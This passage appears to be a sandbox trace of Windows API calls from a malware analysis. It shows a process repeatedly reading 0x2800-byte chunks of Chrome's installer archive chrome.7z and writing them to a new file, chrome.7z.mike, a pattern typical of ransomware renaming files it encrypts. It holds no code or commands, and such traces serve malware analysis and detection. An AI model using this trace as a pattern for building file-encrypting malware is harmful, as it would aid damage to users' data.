dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.428] GetFileType (hFile=0x1c8) returned 0x1 [0179.428] GetFileType (hFile=0x1c8) returned 0x1 [0179.428] ReadFile (in: hFile=0x1c8, lpBuffer=0x213cc90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x213cc90*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.430] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.431] GetFileType (hFile=0x1c8) returned 0x1 [0179.431] GetFileType (hFile=0x1c8) returned 0x1 [0179.431] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46e8a20 [0179.431] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.432] GetFileType (hFile=0x1c8) returned 0x1 [0179.432] GetFileType (hFile=0x1c8) returned 0x1 [0179.432] ReadFile (in: hFile=0x1c8, lpBuffer=0x2149c78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2149c78*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.433] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.434] GetFileType (hFile=0x1c8) returned 0x1 [0179.434] GetFileType (hFile=0x1c8) returned 0x1 [0179.434] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46eb220 [0179.435] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.435] GetFileType (hFile=0x1c8) returned 0x1 [0179.435] GetFileType (hFile=0x1c8) returned 0x1 [0179.436] ReadFile (in: hFile=0x1c8, lpBuffer=0x2156c60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2156c60*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.437] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.437] GetFileType (hFile=0x1c8) returned 0x1 [0179.437] GetFileType (hFile=0x1c8) returned 0x1 [0179.437] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46eda20 [0179.438] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.438] GetFileType (hFile=0x1c8) returned 0x1 [0179.439] GetFileType (hFile=0x1c8) returned 0x1 [0179.439] ReadFile (in: hFile=0x1c8, lpBuffer=0x2163c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2163c48*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.440] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.440] GetFileType (hFile=0x1c8) returned 0x1 [0179.441] GetFileType (hFile=0x1c8) returned 0x1 [0179.441] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46f0220 [0179.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.442] GetFileType (hFile=0x1c8) returned 0x1 [0179.442] GetFileType (hFile=0x1c8) returned 0x1 [0179.442] ReadFile (in: hFile=0x1c8, lpBuffer=0x2170c30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2170c30*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.443] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.443] GetFileType (hFile=0x1c8) returned 0x1 [0179.444] GetFileType (hFile=0x1c8) returned 0x1 [0179.444] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46f2a20 [0179.444] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.444] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.445] GetFileType (hFile=0x1c8) returned 0x1 [0179.445] GetFileType (hFile=0x1c8) returned 0x1 [0179.445] ReadFile (in: hFile=0x1c8, lpBuffer=0x217dc18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x217dc18*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.446] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.447] GetFileType (hFile=0x1c8) returned 0x1 [0179.447] GetFileType (hFile=0x1c8) returned 0x1 [0179.447] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46f5220 [0179.447] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.448] GetFileType (hFile=0x1c8) returned 0x1 [0179.448] GetFileType (hFile=0x1c8) returned 0x1 [0179.448] ReadFile (in: hFile=0x1c8, lpBuffer=0x218ac00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x218ac00*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.449] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.450] GetFileType (hFile=0x1c8) returned 0x1 [0179.450] GetFileType (hFile=0x1c8) returned 0x1 [0179.450] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46f7a20 [0179.451] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.451] GetFileType (hFile=0x1c8) returned 0x1 [0179.451] GetFileType (hFile=0x1c8) returned 0x1 [0179.452] ReadFile (in: hFile=0x1c8, lpBuffer=0x2197be8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2197be8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.453] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.453] GetFileType (hFile=0x1c8) returned 0x1 [0179.453] GetFileType (hFile=0x1c8) returned 0x1 [0179.453] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46fa220 [0179.454] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.454] GetFileType (hFile=0x1c8) returned 0x1 [0179.454] GetFileType (hFile=0x1c8) returned 0x1 [0179.455] ReadFile (in: hFile=0x1c8, lpBuffer=0x21a4bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21a4bd0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.456] GetFileType (hFile=0x1c8) returned 0x1 [0179.456] GetFileType (hFile=0x1c8) returned 0x1 [0179.456] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46fca20 [0179.457] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.457] GetFileType (hFile=0x1c8) returned 0x1 [0179.458] GetFileType (hFile=0x1c8) returned 0x1 [0179.458] ReadFile (in: hFile=0x1c8, lpBuffer=0x21b1bb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21b1bb8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.469] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.469] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.470] GetFileType (hFile=0x1c8) returned 0x1 [0179.470] GetFileType (hFile=0x1c8) returned 0x1 [0179.470] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46ff220 [0179.476] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.476] GetFileType (hFile=0x1c8) returned 0x1 [0179.476] GetFileType (hFile=0x1c8) returned 0x1 [0179.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x21beba0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21beba0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.478] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.478] GetFileType (hFile=0x1c8) returned 0x1 [0179.478] GetFileType (hFile=0x1c8) returned 0x1 [0179.478] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4701a20 [0179.479] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.479] GetFileType (hFile=0x1c8) returned 0x1 [0179.480] GetFileType (hFile=0x1c8) returned 0x1 [0179.480] ReadFile (in: hFile=0x1c8, lpBuffer=0x21cbb88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21cbb88*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.481] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.482] GetFileType (hFile=0x1c8) returned 0x1 [0179.482] GetFileType (hFile=0x1c8) returned 0x1 [0179.482] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4704220 [0179.482] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.483] GetFileType (hFile=0x1c8) returned 0x1 [0179.483] GetFileType (hFile=0x1c8) returned 0x1 [0179.483] ReadFile (in: hFile=0x1c8, lpBuffer=0x21d8b70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21d8b70*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.484] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.485] 